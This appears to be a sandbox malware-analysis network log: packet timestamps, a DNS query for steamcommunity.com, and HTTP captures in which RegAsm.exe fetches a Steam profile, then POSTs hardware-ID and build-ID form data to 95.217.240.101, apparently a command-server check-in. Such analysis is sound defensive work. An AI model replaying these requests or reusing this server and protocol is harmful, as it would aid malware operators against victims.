                                                                              May 17, 2024 18:06:32.087456942 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.087553024 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.087570906 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.087632895 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.118819952 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.118881941 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.119035006 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.119054079 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.119113922 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.121494055 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.121537924 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.121577978 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.121591091 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.121618986 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.121639967 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.124648094 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.124691010 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.124730110 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.124752998 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.124775887 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.124794006 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.127762079 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.127813101 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.127842903 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.127859116 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.127887964 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.127907991 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.130372047 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.130423069 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.130466938 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.130490065 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.130512953 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.130530119 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.132896900 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.132941008 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.132982969 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.133004904 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.133029938 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.133047104 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.150191069 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.150239944 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.150294065 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.150310993 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.150338888 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.150362968 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.154215097 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.154258966 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.154311895 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.154328108 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.154354095 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.154371023 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.167273998 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.167315960 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.167366028 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.167388916 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.167412043 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.167433023 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.180672884 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.180730104 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.180778027 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.180794001 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.180840015 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.180840015 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.191684961 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.191728115 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.191766024 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.191798925 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.191821098 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.191840887 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.194262028 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.194304943 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.194339991 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.194358110 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.194375038 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.194396973 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.196598053 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.196635962 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.196671009 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.196677923 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.196708918 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.196721077 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.198690891 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.198733091 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.198756933 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.563774109 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.579051971 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.579101086 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.579138994 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.579154968 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.579185963 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.579204082 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.598531961 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.598575115 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.598742962 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.598742962 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.598805904 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.598999977 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.613229036 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.613280058 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.613332033 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.613347054 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.613378048 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.613395929 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.628540039 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.628581047 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.628638029 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.628704071 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.628741980 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.628765106 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.643523932 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.643567085 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.643649101 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.643682003 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.643702030 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.643731117 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.658034086 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.658076048 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.658171892 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.658188105 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.658216000 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.658232927 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.675978899 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.676023006 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.676201105 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.676201105 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.676265001 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.676326990 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.692195892 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.692236900 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.692430019 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.692430973 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.692492008 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.692568064 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.716664076 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.716732979 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.716866970 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.716893911 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.716895103 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.716967106 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.717392921 CEST49723443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.717432976 CEST4434972395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.793629885 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.793665886 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:32.793740034 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.793952942 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:32.793962955 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:34.167983055 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:34.168092012 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:34.168698072 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:34.168714046 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:34.168885946 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:34.168894053 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.029179096 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.029196024 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.029208899 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.029236078 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.029273033 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.029285908 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.029334068 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.127324104 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.127346039 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.127471924 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.127491951 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.127533913 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.227179050 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.227200031 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.227241039 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.227255106 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.227277994 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.227294922 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.298963070 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.298985958 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.299139977 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.299176931 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.299226999 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.361243963 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.361268044 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.361360073 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.361382008 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.361428022 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.410337925 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.410358906 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.410552025 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.410582066 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.410631895 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.433968067 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.433990955 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.434086084 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.434099913 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.434139967 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.466800928 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.466826916 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.466878891 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.466888905 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.466916084 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.466934919 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.499644995 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.499665976 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.499767065 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.499779940 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.499819040 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.525774956 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.525794029 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.525882959 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.525895119 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.525937080 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.556220055 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.556246042 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.556359053 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.556386948 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.556433916 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.590512991 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.590533972 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.590745926 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.590774059 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.590823889 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.608095884 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.608129025 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.608208895 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.608216047 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.608257055 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.660242081 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.660264015 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.660381079 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.660409927 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.660459042 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.669722080 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.669754028 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.669806957 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.669816971 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.669848919 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.669859886 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.730034113 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.730093002 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.730137110 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.730144978 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.730184078 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.730217934 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.730598927 CEST49724443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.730654955 CEST4434972495.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.758989096 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.759080887 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:35.759372950 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.759443998 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:35.759460926 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:37.482343912 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:37.482435942 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:37.483032942 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:37.483059883 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:37.483189106 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:37.483200073 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352055073 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352088928 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352118015 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352124929 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.352157116 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352174044 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.352174044 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.352181911 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.352195978 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.352205038 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.352226019 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.422146082 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.422175884 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.422243118 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.422306061 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.422342062 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.422363997 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.651180029 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.651192904 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.651267052 CEST4434972595.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:38.651282072 CEST49725443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:38.651334047 CEST4434972595.217.240.101192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 17, 2024 18:05:50.215388060 CEST | 65439 | 53 | 192.168.2.5 | 1.1.1.1
May 17, 2024 18:05:50.261188984 CEST | 53 | 65439 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 17, 2024 18:05:50.215388060 CEST | 192.168.2.5 | 1.1.1.1 | 0xb9dd | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 17, 2024 18:05:50.261188984 CEST | 1.1.1.1 | 192.168.2.5 | 0xb9dd | No error (0) | steamcommunity.com | | 104.102.42.29 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 95.217.240.101
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.102.42.29 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-17 16:05:51 UTC | 119 | OUT | GET /profiles/76561199686524322 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-17 16:05:52 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 17 May 2024 16:05:52 GMT
Content-Length: 34771
Connection: close
Set-Cookie: sessionid=fe48e086f4e0dfc5754b8ed4; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C5bf5a7430694e6b05582a94131e2eb3f; Path=/; Secure; HttpOnly; SameSite=None
2024-05-17 16:05:52 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-17 16:05:52 UTC | 16384 | IN | Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': fa
2024-05-17 16:05:52 UTC | 3768 | IN | Data Ascii: "{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script
2024-05-17 16:05:52 UTC | 105 | IN | Data Ascii: ></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-17 16:05:54 UTC | 233 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
Host: 95.217.240.101
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-17 16:05:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 May 2024 16:05:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-17 16:05:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54970695.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:05:56 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 278
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="hwid"7B2730E61691922063497-a33c7340-61ca-11ee-8c18-806e6f6e6963------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------H
                                                                              2024-05-17 16:05:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:05:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
